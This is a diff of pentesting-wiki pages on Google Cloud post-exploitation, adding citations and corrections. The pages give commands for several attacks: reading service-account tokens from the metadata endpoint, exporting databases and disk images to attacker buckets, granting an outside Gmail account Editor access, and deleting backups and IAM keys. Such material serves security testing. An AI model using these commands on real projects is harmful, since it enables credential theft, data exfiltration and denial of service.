+For current Cloud Shell sessions, Google documents interactive-user authorization separately from metadata-issued VM service-account tokens. To print the active account's access token, use the authenticated `gcloud` path: <sup>[[2]](#references)[[3]](#references)</sup>
+
+```bash
+gcloud auth print-access-token
+```
+
+When the metadata service is exposed, it is a separate credential source for the Cloud Shell VM's attached service account. Google documents the service-account token endpoint and scope behavior; the current request header is `Metadata-Flavor: Google`, while the older `X-Google-Metadata-Request` header above is deprecated. <sup>[[1]](#references)[[4]](#references)</sup>
+
+To enumerate service-account identities and request the default service-account token with the current header:
+
+```bash
+wget -q -O - --header "Metadata-Flavor: Google" "http://metadata/computeMetadata/v1/instance/service-accounts/"
+wget -q -O - --header "Metadata-Flavor: Google" "http://metadata/computeMetadata/v1/instance/service-accounts/default/token"
+```
+
 ### Container Escape / Docker use
 
 > [!WARNING]
 > Previously the cloud shell run in a container with access to the docker socket of the host. Now Google has changed the architecture and the cloud shell container runs a "Docker in a container" setup. So even if it's possible to use docker from the cloud shell, you won't be able to escape to the host using the docker socket.
 > Note that previously the `docker.sock` file was located in `/google/host/var/run/docker.sock` but now it has been moved to `/run/docker.sock`.
+
+Earlier research also documented Google Cloud Shell exposing the host Docker socket and reported a later restriction of eBPF permissions. <sup>[[5]](#references)</sup> Google's current documentation describes Cloud Shell as a Docker container running on an ephemeral VM and lists Docker as preinstalled; a usable client or socket does not by itself establish host-VM access. <sup>[[1]](#references)</sup>
 
 <details>
 
@@ -68,6 +85,8 @@ https://www.googleapis.com/auth/monitoring.write
 
 If you want to use your google cloud shell instance as proxy you need to run the following commands (or insert them in the .bashrc file):
 
+The linked guide supplies this proxy workflow. <sup>[[8]](#references)</sup>
+
 <details>
 
 <summary>Install Squid proxy</summary>
@@ -79,6 +98,8 @@ sudo apt install -y squid
 </details>
 
 Just for let you know Squid is a http proxy server. Create a **squid.conf** file with the following settings:
+
+Squid's documentation describes the ACL and access-control directives used by this configuration. <sup>[[6]](#references)</sup>
 
 <details>
 
@@ -92,6 +113,9 @@ http_access allow all
 ```
 
 </details>
+
+> [!WARNING]
+> `acl all src 0.0.0.0/0` together with `http_access allow all` permits every IPv4 source to use the proxy. Restrict the source ACL or require authentication before exposing it; Squid documents defining client IP ACLs and allowing only those clients. <sup>[[6]](#references)</sup>
 
 copy the **squid.conf** file to **/etc/squid**
 
@@ -119,6 +143,8 @@ sudo service squid start
 
 Use ngrok to let the proxy be available from outside:
 
+ngrok documents TCP tunnels for publishing a local TCP service through an ngrok endpoint, and the linked guide applies that workflow to port 3128. <sup>[[7]](#references)[[8]](#references)</sup>
+
 <details>
 
 <summary>Expose proxy with ngrok</summary>
@@ -131,7 +157,11 @@ Use ngrok to let the proxy be available from outside:
 
 After running copy the tcp:// url. If you want to run the proxy from a browser it is suggested to remove the tcp:// part and the port and put the port in the port field of your browser proxy settings (squid is a http proxy server).
 
+The TCP endpoint format and forwarding behavior are documented by ngrok. <sup>[[7]](#references)</sup>
+
 For better use at startup the .bashrc file should have the following lines:
+
+The startup sequence is retained from the linked guide. <sup>[[8]](#references)</sup>
 
 <details>
 
@@ -146,9 +176,17 @@ cd ngrok;./ngrok tcp 3128
 
 </details>
 
-The instructions were copied from [https://github.com/FrancescoDiSalesGithub/Google-cloud-shell-hacking?tab=readme-ov-file#ssh-on-the-google-cloud-shell-using-the-private-key](https://github.com/FrancescoDiSalesGithub/Google-cloud-shell-hacking?tab=readme-ov-file#ssh-on-the-google-cloud-shell-using-the-private-key). Check that page for other crazy ideas to run any kind of software (databases and even windows) in Cloud Shell.
+The instructions were copied from [https://github.com/FrancescoDiSalesGithub/Google-cloud-shell-hacking?tab=readme-ov-file#ssh-on-the-google-cloud-shell-using-the-private-key](https://github.com/FrancescoDiSalesGithub/Google-cloud-shell-hacking?tab=readme-ov-file#ssh-on-the-google-cloud-shell-using-the-private-key). Check that page for other crazy ideas to run any kind of software (databases and even windows) in Cloud Shell. <sup>[[8]](#references)</sup>
+
+## References
+
+- [1] [How Cloud Shell works](https://cloud.google.com/shell/docs/how-cloud-shell-works)
+- [2] [Authorize with Cloud Shell](https://cloud.google.com/shell/docs/auth)
+- [3] [gcloud auth print-access-token](https://cloud.google.com/sdk/gcloud/reference/auth/print-access-token)
+- [4] [View and query VM metadata](https://cloud.google.com/compute/docs/metadata/querying-metadata)
+- [5] [Cross Container Attacks: The Bewildered eBPF on Clouds](https://www.usenix.org/system/files/usenixsecurity23-he.pdf)
+- [6] [Access Controls in Squid](https://wiki.squid-cache.org/SquidFaq/SquidAcl)
+- [7] [Secure Tunnels](https://ngrok.com/docs/guides/share-localhost/tunnels)
+- [8] [Google Cloud Shell Hacking](https://github.com/FrancescoDiSalesGithub/Google-cloud-shell-hacking)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-

--- a/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-sql-post-exploitation.md
+++ b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-sql-post-exploitation.md
@@ -12,7 +12,9 @@ For more information about Cloud SQL check:
 
 ### `cloudsql.instances.update`, ( `cloudsql.instances.get`)
 
-To connect to the databases you **just need access to the database port** and know the **username** and **password**, there isn't any IAM requirements. So, an easy way to get access, supposing that the database has a public IP address, is to update the allowed networks and **allow your own IP address to access it**.
+To connect to the databases you **just need access to the database port** and know the **username** and **password**, there isn't any IAM requirements. So, an easy way to get access, supposing that the database has a public IP address, is to update the allowed networks and **allow your own IP address to access it**.<sup>[[1]](#references)[[2]](#references)[[4]](#references)[[6]](#references)</sup>
+
+For the direct built-in username/password flow, database authentication is separate from IAM database authentication. The `gcloud sql connect` helper itself requires `cloudsql.instances.get` and `cloudsql.instances.update`, while changing the authorized networks requires the update permission.<sup>[[1]](#references)[[2]](#references)[[4]](#references)[[6]](#references)</sup>
 
 <details>
 
@@ -33,13 +35,17 @@ gcloud sql connect mysql --user=root --quiet
 
 </details>
 
-It's also possible to use **`--no-backup`** to **disrupt the backups** of the database.
+It's also possible to use **`--no-backup`** to **disrupt the backups** of the database.<sup>[[5]](#references)</sup>
+
+The `--no-backup` flag disables daily backups.<sup>[[5]](#references)</sup>
 
 As these are the requirements I'm not completely sure what are the permissions **`cloudsql.instances.connect`** and **`cloudsql.instances.login`** for. If you know it send a PR!
 
+Google documents **`cloudsql.instances.connect`** for Google Cloud services connecting to an instance through an internal path, and **`cloudsql.instances.login`** for IAM database authentication; neither is part of the direct built-in username/password flow described above.<sup>[[2]](#references)[[3]](#references)</sup>
+
 ### `cloudsql.users.list`
 
-Get a **list of all the users** of the database:
+Get a **list of all the users** of the database:<sup>[[1]](#references)</sup>
 
 <details>
 
@@ -53,7 +59,7 @@ gcloud sql users list --instance <intance-name>
 
 ### `cloudsql.users.create`
 
-This permission allows to **create a new user inside** the database:
+This permission allows to **create a new user inside** the database:<sup>[[1]](#references)[[7]](#references)</sup>
 
 <details>
 
@@ -67,7 +73,7 @@ gcloud sql users create <username> --instance <instance-name> --password <passwo
 
 ### `cloudsql.users.update`
 
-This permission allows to **update user inside** the database. For example, you could change its password:
+This permission allows to **update user inside** the database. For example, you could change its password:<sup>[[1]](#references)[[8]](#references)</sup>
 
 <details>
 
@@ -82,7 +88,7 @@ gcloud sql users set-password <username> --instance <instance-name> --password <
 ### `cloudsql.instances.restoreBackup`, `cloudsql.backupRuns.get`
 
 Backups might contain **old sensitive information**, so it's interesting to check them.\
-**Restore a backup** inside a database:
+**Restore a backup** inside a database:<sup>[[1]](#references)[[9]](#references)</sup>
 
 <details>
 
@@ -98,7 +104,7 @@ To do it in a more stealth way it's recommended to create a new SQL instance and
 
 ### `cloudsql.backupRuns.delete`
 
-This permission allow to delete backups:
+This permission allow to delete backups:<sup>[[1]](#references)[[10]](#references)</sup>
 
 <details>
 
@@ -112,7 +118,7 @@ gcloud sql backups delete <backup-id> --instance <instance-id>
 
 ### `cloudsql.instances.export`, `storage.objects.create`
 
-**Export a database** to a Cloud Storage Bucket so you can access it from there:
+**Export a database** to a Cloud Storage Bucket so you can access it from there:<sup>[[1]](#references)[[11]](#references)[[13]](#references)[[15]](#references)</sup>
 
 <details>
 
@@ -127,7 +133,7 @@ gcloud sql export sql <instance-id> <gs://bucketName/fileName> --database <db>
 
 ### `cloudsql.instances.import`, `storage.objects.get`
 
-**Import a database** (overwrite) from a Cloud Storage Bucket:
+**Import a database** (overwrite) from a Cloud Storage Bucket:<sup>[[1]](#references)[[12]](#references)[[13]](#references)[[15]](#references)</sup>
 
 <details>
 
@@ -142,7 +148,7 @@ gcloud sql import sql <instance-id> <gs://bucketName/fileName>
 
 ### `cloudsql.databases.delete`
 
-Delete a database from the db instance:
+Delete a database from the db instance:<sup>[[1]](#references)[[14]](#references)</sup>
 
 <details>
 
@@ -154,7 +160,22 @@ gcloud sql databases delete <db-name> --instance <instance-id>
 
 </details>
 
+## References
+
+- [1] [Cloud SQL permissions](https://cloud.google.com/sql/docs/mysql/iam-permissions)
+- [2] [Roles and permissions](https://cloud.google.com/sql/docs/mysql/roles-and-permissions)
+- [3] [IAM authentication](https://cloud.google.com/sql/docs/mysql/iam-authentication)
+- [4] [Authorize with authorized networks](https://cloud.google.com/sql/docs/mysql/authorize-networks)
+- [5] [gcloud sql instances patch](https://cloud.google.com/sdk/gcloud/reference/sql/instances/patch)
+- [6] [gcloud sql connect](https://cloud.google.com/sdk/gcloud/reference/sql/connect)
+- [7] [gcloud sql users create](https://cloud.google.com/sdk/gcloud/reference/sql/users/create)
+- [8] [gcloud sql users set-password](https://cloud.google.com/sdk/gcloud/reference/sql/users/set-password)
+- [9] [gcloud sql backups restore](https://cloud.google.com/sdk/gcloud/reference/sql/backups/restore)
+- [10] [gcloud sql backups delete](https://cloud.google.com/sdk/gcloud/reference/sql/backups/delete)
+- [11] [gcloud sql export sql](https://cloud.google.com/sdk/gcloud/reference/sql/export/sql)
+- [12] [gcloud sql import sql](https://cloud.google.com/sdk/gcloud/reference/sql/import/sql)
+- [13] [IAM permissions for Cloud Storage](https://cloud.google.com/storage/docs/access-control/iam-permissions)
+- [14] [gcloud sql databases delete](https://cloud.google.com/sdk/gcloud/reference/sql/databases/delete)
+- [15] [Export and import using SQL dump files](https://cloud.google.com/sql/docs/mysql/import-export/import-export-sql)
+
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-

--- a/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-compute-post-exploitation.md
+++ b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-compute-post-exploitation.md
@@ -14,7 +14,7 @@ For more information about Compute and VPC (Networking) check:
 
 This would allow an attacker to **access the data contained inside already existing images** or **create new images of running VMs** and access their data without having access to the running VM.
 
-It's possible to export a VM image to a bucket and then download it and mount it locally with the command:
+It's possible to export a VM image to a bucket and then download it and mount it locally with the command:<sup>[[2]](#references)</sup>
 
 <details>
 
@@ -27,22 +27,23 @@ gcloud compute images export --destination-uri gs://<bucket-name>/image.vmdk --i
 
 </details>
 
-Fore performing this action the attacker might need privileges over the storage bucket and for sure **privileges over cloudbuild** as it's the **service** which is going to be asked to perform the export\
-Moreover, for this to work the codebuild SA and the compute SA needs privileged permissions.\
-The cloudbuild SA `<project-id>@cloudbuild.gserviceaccount.com` needs:
+Before performing this action, the attacker might need access to the destination storage bucket and **permissions to use Cloud Build**, which performs the export.<sup>[[1]](#references)[[2]](#references)</sup> The invoking account also needs the documented bucket, viewer, IAM, and Cloud Build permissions (or equivalent custom permissions).<sup>[[1]](#references)</sup> The Cloud Build and Compute Engine service accounts also need the documented roles. Use the numeric project number in these default service-account addresses; depending on when Cloud Build was first used in the project, the workflow might instead use the default Compute Engine service account, so verify the actual identity:<sup>[[1]](#references)</sup>
+
+The Cloud Build SA `<project-number>@cloudbuild.gserviceaccount.com` needs:<sup>[[1]](#references)[[2]](#references)</sup>
 
 - roles/iam.serviceAccountTokenCreator
 - roles/compute.admin
 - roles/iam.serviceAccountUser
 
-And the SA `<project-id>-compute@developer.gserviceaccount.com` needs:
+And the Compute Engine SA `<project-number>-compute@developer.gserviceaccount.com` needs for an export:<sup>[[1]](#references)</sup>
 
-- oles/compute.storageAdmin
+- roles/compute.storageAdmin
 - roles/storage.objectAdmin
+- roles/storage.admin
 
 ### Export & Inspect Snapshots & Disks locally
 
-It's not possible to directly export snapshots and disks, but it's possible to **transform a snapshot in a disk, a disk in an image** and following the **previous section**, export that image to inspect it locally
+The image export command does not take snapshots or disks directly, but it's possible to **transform a snapshot in a disk, a disk in an image** and, following the **previous section**, export that image to inspect it locally.<sup>[[2]](#references)[[3]](#references)[[4]](#references)</sup>
 
 <details>
 
@@ -60,7 +61,7 @@ gcloud compute images create [IMAGE_NAME] --source-disk=[NEW_DISK_NAME] --source
 
 ### Inspect an Image creating a VM
 
-With the goal of accessing the **data stored in an image** or inside a **running VM** from where an attacker **has created an image,** it possible to grant an external account access over the image:
+With the goal of accessing the **data stored in an image** or inside a **running VM** from where an attacker **has created an image,** it is possible to grant an external account access to the image by assigning `roles/compute.imageUser` in the source project:<sup>[[5]](#references)</sup>
 
 <details>
 
@@ -74,7 +75,7 @@ gcloud projects add-iam-policy-binding [SOURCE_PROJECT_ID] \
 
 </details>
 
-and then create a new VM from it:
+and then create a new VM from it:<sup>[[6]](#references)</sup>
 
 <details>
 
@@ -89,7 +90,7 @@ gcloud compute instances create [INSTANCE_NAME] \
 
 </details>
 
-If you could not give your external account access over image, you could launch a VM using that image in the victims project and **make the metadata execute a reverse shell** to access the image adding the param:
+If you could not give your external account access to the image, you could launch a VM using that image in the victim's project and **make the metadata execute a reverse shell** to access the image by adding the `startup-script` metadata key; on images with the Compute Engine guest tools installed, this key runs the script when the instance starts.<sup>[[6]](#references)</sup>
 
 <details>
 
@@ -104,9 +105,9 @@ If you could not give your external account access over image, you could launch 
 
 ### Inspect a Snapshot/Disk attaching it to a VM
 
-With the goal of accessing the **data stored in a disk or a snapshot, you could transform the snapshot into a disk, a disk into an image and follow th preivous steps.**
+With the goal of accessing the **data stored in a disk or a snapshot, you could transform the snapshot into a disk, a disk into an image and follow the previous steps.**
 
-Or you could **grant an external account access** over the disk (if the starting point is a snapshot give access over the snapshot or create a disk from it):
+Or you could **grant an external account access** over the disk (if the starting point is a snapshot give access over the snapshot or create a disk from it). Project-level `roles/compute.storageAdmin` covers management of disks, images, and snapshots, while attaching the disk also requires disk-use and instance-attach permissions:<sup>[[5]](#references)[[7]](#references)</sup>
 
 <details>
 
@@ -120,7 +121,7 @@ gcloud projects add-iam-policy-binding [PROJECT_ID] \
 
 </details>
 
-**Attach the disk** to an instance:
+**Attach the disk** to an instance:<sup>[[7]](#references)</sup>
 
 <details>
 
@@ -136,7 +137,7 @@ gcloud compute instances attach-disk [INSTANCE_NAME] \
 
 Mount the disk inside the VM:
 
-1.  **SSH into the VM**:
+1.  **SSH into the VM**:<sup>[[9]](#references)</sup>
 
     <details>
     
@@ -148,8 +149,8 @@ Mount the disk inside the VM:
     
     </details>
 
-2.  **Identify the Disk**: Once inside the VM, identify the new disk by listing the disk devices. Typically, you can find it as `/dev/sdb`, `/dev/sdc`, etc.
-3.  **Format and Mount the Disk** (if it's a new or raw disk):
+2.  **Identify the Disk**: Once inside the VM, identify the new disk by listing the persistent-device symlinks; it may appear as `/dev/sdb`, `/dev/sdc`, etc.<sup>[[8]](#references)</sup>
+3.  **Format and Mount the Disk** (if it's a new or raw disk): Format only a blank/raw disk because formatting destroys existing data; an existing filesystem only needs to be mounted.<sup>[[8]](#references)</sup>
 
     - Create a mount point:
 
@@ -175,9 +176,19 @@ Mount the disk inside the VM:
       
       </details>
 
-If you **cannot give access to a external project** to the snapshot or disk, you might need to p**erform these actions inside an instance in the same project as the snapshot/disk**.
+If you **cannot give access to an external project** to the snapshot or disk, you might need to p**erform these actions inside an instance in the same project as the snapshot/disk**; the VM and disk must also be in compatible locations for attachment.<sup>[[7]](#references)</sup>
+
+## References
+
+- [1] [Prerequisites for importing and exporting VM images](https://cloud.google.com/compute/docs/import/requirements-export-import-images)
+- [2] [gcloud compute images export](https://cloud.google.com/sdk/gcloud/reference/compute/images/export)
+- [3] [gcloud compute disks create](https://cloud.google.com/sdk/gcloud/reference/compute/disks/create)
+- [4] [gcloud compute images create](https://cloud.google.com/sdk/gcloud/reference/compute/images/create)
+- [5] [Manage access to custom images](https://cloud.google.com/compute/docs/images/managing-access-custom-images)
+- [6] [gcloud compute instances create](https://cloud.google.com/sdk/gcloud/reference/compute/instances/create)
+- [7] [Attach a non-boot disk to a VM](https://cloud.google.com/compute/docs/disks/attach-disks)
+- [8] [Format and mount a non-boot disk on a Linux VM](https://cloud.google.com/compute/docs/disks/format-mount-disk-linux)
+- [9] [gcloud compute ssh](https://cloud.google.com/sdk/gcloud/reference/compute/ssh)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
 

--- a/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-dataflow-post-exploitation.md
+++ b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-dataflow-post-exploitation.md
@@ -12,16 +12,16 @@ For more information about Dataflow check:
 
 ### Using Dataflow to exfiltrate data from other services
 
-**Permissions:** `dataflow.jobs.create`, `resourcemanager.projects.get`, `iam.serviceAccounts.actAs` (over a SA with access to source and sink)
+**Permissions:** `dataflow.jobs.create`, `resourcemanager.projects.get`, `iam.serviceAccounts.actAs` (over a SA with access to source and sink)<sup>[[2]](#references)[[5]](#references)</sup>
 
-With Dataflow job creation rights, you can use GCP Dataflow templates to export data from Bigtable, BigQuery, Pub/Sub, and other services into attacker-controlled GCS buckets. This is a powerful post-exploitation technique when you have obtained Dataflow access—for example via the [Dataflow Rider](../gcp-privilege-escalation/gcp-dataflow-privesc.md) privilege escalation (pipeline takeover via bucket write).
+With Dataflow job creation rights, you can use GCP Dataflow templates to export data from Bigtable, BigQuery, Pub/Sub, and other services into attacker-controlled GCS buckets.<sup>[[1]](#references)[[2]](#references)</sup> This is a powerful post-exploitation technique when you have obtained Dataflow access—for example via the [Dataflow Rider](../gcp-privilege-escalation/gcp-dataflow-privesc.md) privilege escalation (pipeline takeover via bucket write).<sup>[[4]](#references)</sup>
 
 > [!NOTE]
-> You need `iam.serviceAccounts.actAs` over a service account with sufficient permissions to read the source and write to the sink. By default, the Compute Engine default SA is used if not specified.
+> You need `iam.serviceAccounts.actAs` over a service account with sufficient permissions to read the source and write to the sink. By default, the Compute Engine default SA is used if not specified.<sup>[[2]](#references)</sup>
 
 #### Bigtable to GCS
 
-See [GCP - Bigtable Post Exploitation](gcp-bigtable-post-exploitation.md#dump-rows-to-your-bucket) — "Dump rows to your bucket" for the full pattern. Templates: `Cloud_Bigtable_to_GCS_Json`, `Cloud_Bigtable_to_GCS_Parquet`, `Cloud_Bigtable_to_GCS_SequenceFile`.
+See [GCP - Bigtable Post Exploitation](gcp-bigtable-post-exploitation.md#dump-rows-to-your-bucket) — "Dump rows to your bucket" for the full pattern. Templates: `Cloud_Bigtable_to_GCS_Json`, `Cloud_Bigtable_to_GCS_Parquet`, `Cloud_Bigtable_to_GCS_SequenceFile`.<sup>[[1]](#references)[[3]](#references)[[6]](#references)</sup>
 
 <details>
 
@@ -38,18 +38,24 @@ gcloud dataflow jobs run <job-name> \
 
 </details>
 
+> Google’s template documentation uses `gs://dataflow-templates-<REGION>/<VERSION>/` when `<REGION>` is the full Dataflow region (for example, `us-central1`).<sup>[[6]](#references)</sup>
+
 #### BigQuery to GCS
 
-Dataflow templates exist to export BigQuery data. Use the appropriate template for your target format (JSON, Avro, etc.) and point the output to your bucket.
+Dataflow templates exist to export BigQuery data.<sup>[[1]](#references)</sup> Use the appropriate template for your target format (JSON, Avro, etc.) and point the output to your bucket.
 
 #### Pub/Sub and streaming sources
 
-Streaming pipelines can read from Pub/Sub (or other sources) and write to GCS. Launch a job with a template that reads from the target Pub/Sub subscription and writes to your controlled bucket.
+Streaming pipelines can read from Pub/Sub (or other sources) and write to GCS. Launch a job with a template that reads from the target Pub/Sub subscription and writes to your controlled bucket.<sup>[[1]](#references)[[7]](#references)</sup>
 
 ## References
 
-- [Dataflow templates](https://cloud.google.com/dataflow/docs/guides/templates/provided-templates)
-- [Control access with IAM (Dataflow)](https://cloud.google.com/dataflow/docs/concepts/security-and-permissions)
-- [GCP - Bigtable Post Exploitation](gcp-bigtable-post-exploitation.md)
+- [1] [Dataflow templates](https://cloud.google.com/dataflow/docs/guides/templates/provided-templates)
+- [2] [Control access with IAM (Dataflow)](https://cloud.google.com/dataflow/docs/concepts/security-and-permissions)
+- [3] [GCP - Bigtable Post Exploitation](gcp-bigtable-post-exploitation.md)
+- [4] [Dataflow Rider: How Attackers can Abuse Shadow Resources in Google Cloud Dataflow](https://www.varonis.com/blog/dataflow-rider)
+- [5] [Dataflow roles and permissions](https://cloud.google.com/iam/docs/roles-permissions/dataflow)
+- [6] [Bigtable to JSON template](https://cloud.google.com/dataflow/docs/guides/templates/provided/bigtable-to-json)
+- [7] [Pub/Sub Topic or Subscription to Text Files on Cloud Storage template](https://cloud.google.com/dataflow/docs/guides/templates/provided/pubsub-topic-subscription-to-text)
 
 {{#include ../../../banners/hacktricks-training.md}}

--- a/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-filestore-post-exploitation.md
+++ b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-filestore-post-exploitation.md
@@ -12,7 +12,9 @@ For more information about Filestore check:
 
 ### Mount Filestore
 
-A shared filesystem **might contain sensitive information** interesting from an attackers perspective. With access to the Filestore it's possible to **mount it**:
+A shared filesystem **might contain sensitive information** interesting from an attackers perspective.
+
+With access to the Filestore, mount its NFS share from a client VM as follows. <sup>[[1]](#references)</sup>
 
 <details>
 
@@ -30,7 +32,7 @@ sudo mount [FILESTORE_IP]:/[FILE_SHARE_NAME] /mnt/fs
 
 </details>
 
-To find the IP address of a filestore insatnce check the enumeration section of the page:
+To find the IP address of a Filestore instance, check the enumeration section of the page:
 
 {{#ref}}
 ../gcp-services/gcp-filestore-enum.md
@@ -38,7 +40,9 @@ To find the IP address of a filestore insatnce check the enumeration section of 
 
 ### Remove Restrictions and get extra permissions
 
-If the attacker isn't in an IP address with access over the share, but you have enough permissions to modify it, it's possible to remover the restrictions or access over it. It's also possible to grant more privileges over your IP address to have admin access over the share:
+If the client IP isn't allowed by the export but you have permission to edit the Filestore instance, update the NFS export rules to add your IP or adjust read/write and root-squash behavior. The `ip-ranges` and `access-mode` fields control which clients can mount and whether they can read or write; `NO_ROOT_SQUASH` allows root access on the exported share. <sup>[[2]](#references)[[3]](#references)</sup>
+
+The example below retains the original no-root-squash rule. Current `gcloud` validation rejects `anon_uid` and `anon_gid` when `squash-mode` is `NO_ROOT_SQUASH`; omit those two fields for this rule, or use `ROOT_SQUASH` when anonymous-ID mapping is needed. <sup>[[3]](#references)</sup>
 
 <details>
 
@@ -74,7 +78,7 @@ gcloud filestore instances update nfstest \
 
 ### Restore a backup
 
-If there is a backup it's possible to **restore it** in an existing or in a new instance so its **information becomes accessible:**
+If there is a backup, it can be **restored** to an existing instance (where the service tier supports it) or to a new instance so its **information becomes accessible**. <sup>[[4]](#references)</sup>
 
 <details>
 
@@ -100,9 +104,11 @@ gcloud filestore instances restore <new-instance-name> \
 
 </details>
 
+The first command creates a target instance and the second restores the backup into its file share. Check the backup's tier and capacity requirements before restoring; the target capacity must be sufficient for the backup. <sup>[[4]](#references)[[5]](#references)</sup>
+
 ### Create a backup and restore it
 
-If you **don't have access over a share and don't want to modify it**, it's possible to **create a backup** of it and **restore** it as previously mentioned:
+If you **can't mount a share and don't want to modify it**, but your identity can create Filestore backups, it's possible to **create a backup** of it and **restore** it as previously mentioned. <sup>[[6]](#references)</sup>
 
 <details>
 
@@ -121,7 +127,15 @@ gcloud filestore backups create <back-name> \
 
 </details>
 
-{{#include ../../../banners/hacktricks-training.md}}
+## References
 
+- [1] [Mounting file shares on Compute Engine clients](https://docs.cloud.google.com/filestore/docs/mounting-fileshares)
+- [2] [Access control](https://docs.cloud.google.com/filestore/docs/access-control)
+- [3] [gcloud filestore instances update](https://docs.cloud.google.com/sdk/gcloud/reference/filestore/instances/update)
+- [4] [Restore data](https://docs.cloud.google.com/filestore/docs/restore-data)
+- [5] [gcloud filestore instances create](https://docs.cloud.google.com/sdk/gcloud/reference/filestore/instances/create)
+- [6] [gcloud filestore backups create](https://docs.cloud.google.com/sdk/gcloud/reference/filestore/backups/create)
+
+{{#include ../../../banners/hacktricks-training.md}}
 
 

--- a/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-iam-post-exploitation.md
+++ b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-iam-post-exploitation.md
@@ -12,11 +12,11 @@ You can find further information about IAM in:
 
 ### Granting access to management console <a href="#granting-access-to-management-console" id="granting-access-to-management-console"></a>
 
-Access to the [GCP management console](https://console.cloud.google.com) is **provided to user accounts, not service accounts**. To log in to the web interface, you can **grant access to a Google account** that you control. This can be a generic "**@gmail.com**" account, it does **not have to be a member of the target organization**.
+Access to the [GCP management console](https://console.cloud.google.com) is **provided to user accounts, not service accounts**: service accounts cannot be used for browser-based sign-in. To log in to the web interface, you can **grant access to a Google account** that you control. This can be a generic "**@gmail.com**" account, and it does **not have to be a member of the target organization**.<sup>[[1]](#references)[[2]](#references)[[3]](#references)</sup>
 
-To **grant** the primitive role of **Owner** to a generic "@gmail.com" account, though, you'll need to **use the web console**. `gcloud` will error out if you try to grant it a permission above Editor.
+To **grant** the primitive role of **Owner** to a generic "@gmail.com" account, though, you'll need to **use the web console**. For this external-user workflow, `gcloud` cannot grant a role above the primitive **Editor** role; the documented Owner exception must be handled in the console.<sup>[[3]](#references)</sup>
 
-You can use the following command to **grant a user the primitive role of Editor** to your existing project:
+You can use the following command to **grant a user the primitive role of Editor** to your existing project:<sup>[[4]](#references)</sup>
 
 ```bash
 gcloud projects add-iam-policy-binding [PROJECT] --member user:[EMAIL] --role roles/editor
@@ -24,40 +24,56 @@ gcloud projects add-iam-policy-binding [PROJECT] --member user:[EMAIL] --role ro
 
 If you succeeded here, try **accessing the web interface** and exploring from there.
 
-This is the **highest level you can assign using the gcloud tool**.
+For this external-user workflow, **Editor is the highest primitive role you can assign using the gcloud tool**; Owner is the console-only exception.<sup>[[3]](#references)[[4]](#references)</sup>
 
 ### Delete IAM components `iam.*.delete`
-The `iam.*.delete` permissions (e.g., `iam.roles.delete`, `iam.serviceAccountApiKeyBindings.delete`, `iam.serviceAccountKeys.delete`, etc.) allow an identity to delete critical IAM components such as custom roles, API key bindings, service account keys, and the service accounts themselves. In the hands of an attacker, this makes it possible to remove legitimate access mechanisms in order to cause a denial of service.
+The `iam.*.delete` permissions (e.g., `iam.roles.delete`, `iam.serviceAccountApiKeyBindings.delete`, `iam.serviceAccountKeys.delete`, etc.) allow an identity to delete critical IAM components such as custom roles, API key bindings, service account keys, and the service accounts themselves. Deleting a service account removes workload access, while deleting a key permanently prevents that key from authenticating; an attacker could therefore remove legitimate access mechanisms and cause a denial of service.<sup>[[5]](#references)[[7]](#references)[[10]](#references)</sup>
 
-To carry out such an attack, it is possible, for example, to delete roles using:
+To carry out such an attack, it is possible, for example, to delete roles using:<sup>[[6]](#references)</sup>
 ```bash
 gcloud iam roles delete <ROLE_ID> --project=<PROJECT_ID>
 ```
 
 ### `iam.serviceAccountKeys.disable` || `iam.serviceAccounts.disable`
 
-The `iam.serviceAccountKeys.disable` and `iam.serviceAccounts.disable` permissions allow disabling active service account keys or service accounts, which in the hands of an attacker could be used to disrupt operations, cause denial of service, or hinder incident response by preventing the use of legitimate credentials.
+The `iam.serviceAccountKeys.disable` and `iam.serviceAccounts.disable` permissions allow disabling active service account keys or service accounts. Disabling a key prevents authentication with that key but does not revoke short-lived credentials already issued; disabling the service account causes credential generation and API requests using it to fail. In the hands of an attacker, these operations could disrupt operations, cause denial of service, or hinder incident response by preventing the use of legitimate credentials.<sup>[[5]](#references)[[8]](#references)[[9]](#references)</sup>
 
-To disable a Service Account, you can use the following command:
+To disable a Service Account, you can use the following command:<sup>[[9]](#references)</sup>
 
 ```bash
 gcloud iam service-accounts disable <SA_EMAIL> --project=<PROJECT_ID>
 ```
 
-To disable the keys of a Service Account, you can use the following command:
+To disable the keys of a Service Account, you can use the following command:<sup>[[8]](#references)</sup>
 
 ```bash
 gcloud iam service-accounts keys disable <KEY_ID> --iam-account=<SA_EMAIL>
 ```
 
 ### `iam.*.undelete`
-The `iam.*.undelete` permissions allow restoring previously deleted elements such as API key bindings, custom roles, or service accounts. In the hands of an attacker, this can be used to reverse defensive actions (recover removed access), re-establish deleted compromise vectors to maintain persistence, or evade remediation efforts, complicating incident containment.
+The `iam.*.undelete` permissions allow restoring previously deleted elements such as API key bindings, custom roles, or service accounts. Google documents `iam.roles.undelete`, `iam.serviceAccountApiKeyBindings.undelete`, and `iam.serviceAccounts.undelete` as distinct permissions; in the hands of an attacker, these can reverse defensive actions (recover removed access), re-establish deleted compromise vectors to maintain persistence, or evade remediation efforts, complicating incident containment.<sup>[[5]](#references)[[10]](#references)[[11]](#references)</sup>
+
+The service-account command restores a deleted account by its unique ID:<sup>[[12]](#references)</sup>
 
 ```bash
 gcloud iam service-accounts undelete "${SA_ID}" --project="${PROJECT}"
 ```
 
-{{#include ../../../banners/hacktricks-training.md}}
+## References
 
+- [1] [IAM principals](https://docs.cloud.google.com/iam/docs/principals-overview)
+- [2] [Best practices for using service accounts securely](https://docs.cloud.google.com/iam/docs/best-practices-service-accounts)
+- [3] [Manage access to projects, folders, and organizations](https://docs.cloud.google.com/iam/docs/granting-changing-revoking-access)
+- [4] [gcloud projects add-iam-policy-binding](https://docs.cloud.google.com/sdk/gcloud/reference/projects/add-iam-policy-binding)
